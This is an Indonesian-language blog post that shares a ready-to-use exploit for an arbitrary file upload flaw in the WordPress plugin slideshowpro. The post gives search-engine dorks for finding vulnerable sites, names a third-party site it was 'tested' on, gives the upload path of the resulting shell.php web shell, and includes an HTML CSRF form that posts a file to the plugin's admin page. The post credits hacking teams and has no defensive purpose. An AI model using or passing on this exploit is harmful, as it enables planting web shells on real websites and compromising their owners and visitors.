Wordpress Plugin slideshowpro Arbitrary File Upload


kali ini gua akan share Wordpress Plugin slideshowpro Arbitrary File Upload , cekidot

// Author   : i.am_geek
// Team     : K33P-S1L3NT
// Notif    : Ternate Lab Pentesting
// page     : https://www.facebook.com/loading.gov
// Plugins  : https://wordpress.org/plugins/slide-show-pro/
// Category : Webapps 
// Tested   : http://www.gotdirtywindows.com.au/
// Dork     : inurl:/wp-content/plugins/slide-show-pro/  or inurl:plugins/slide-show-pro/  or  inurl:/wp-content/uploads/slideshowpro/
// shell    : /wp-content/uploads/slideshowpro/1_uploadfolder/big/shell.php
// Grets    : s1puT | geek_Defcon | kazutto_kun | Zbyte | Badaki | 1!0N7!N | QueenAisyha 
// Special  : Iran-Hack | Turkish-Hack | Overload Team | Ellite Pirates | Tunisia Black Security | Algarian Sec | Indonesia Noobs 

// Proof of Concept 

// Make sure to replace “[path to WordPress]” with the location of WordPress.

// CSRF CODE : 

<html><body><form action="http://[path to WordPress]/wp-admin/admin.php?page=slideshowpro_manage" method="POST" enctype="multipart/form-data"><input type="hidden" name="task" value="pro_add_new_album" /><input type="hidden" name="album_name" value="Arbitrary File Upload" /><input type="hidden" name="album_desc" value="Arbitrary File Upload" /><input type="file" name="album_img" value="" /><input type="submit" value="Submit" /></form></body></html>

masih belum mengerti ?

Video demo : https://www.youtube.com/watch?v=cVAX1To8cag

Thanks to : Ternate lab Pantesting
Previous
Next Post »
0 Komentar